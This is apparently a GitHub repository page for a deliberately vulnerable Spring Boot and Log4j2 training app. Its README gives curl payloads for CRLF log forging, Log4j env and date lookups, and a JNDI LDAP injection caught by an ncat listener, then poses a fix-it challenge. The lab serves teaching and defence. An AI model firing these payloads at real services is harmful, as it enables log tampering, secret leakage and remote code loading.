Skip to content
/ log-injection-spring-boot-log4j2 Public

This application is a demonstration prototype just to show how to perform Log Forging attack using CRLF Injection and JNDI injection

License

MIT license
0 stars 3 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xdbe-appsec/log-injection-spring-boot-log4j2

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
gradle/wrapper
gradle/wrapper
 
 
src
src
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
build.gradle
build.gradle
 
 
gradlew
gradlew
 
 
gradlew.bat
gradlew.bat
 
 
settings.gradle
settings.gradle
 
 

Repository files navigation

Log Injection with Spring Boot and Log4J2

Usage

  • Run
./gradlew bootRun
  • Request
curl http://localhost:8080/\?name\=Frodon

Hack

Using CRLF injection

curl http://localhost:8080/\?name\=Marty%0d%0a1985-10-30%2021%3A59%3A01.108%20DEBUG%20128537%20---%20%5Bnio-8080-exec-1%5D%20net.example.logging.HelloController%20%20%20%20%20%20%3A%20You%20have%20been%20pwed%0A

Using date lookup

Date lookup ${date:yyyyMMdd-HHmmss}:

curl http://localhost:8080/\?name\=%24%7Bdate%3AyyyyMMdd-HHmmss%7D

Using env lookup

Env lookup ${env:USER}:

curl http://localhost:8080/\?name\=%24%7Benv%3AUSER%7D

Using JNDI Injection

  • Run a listener
ncat -v -l -p 5000
  • JNDI LDAP lookup: Hello ${jndi:ldap://localhost:5000}%
curl http://localhost:8080/\?name\=%24%7Bjndi%3Aldap%3A%2F%2Flocalhost%3A5000%7D

Fix

Try to fix this app! Don't disable JNDI Lookup, this could be usefull.

About

This application is a demonstration prototype just to show how to perform Log Forging attack using CRLF Injection and JNDI injection

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

0 stars

Watchers

0 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages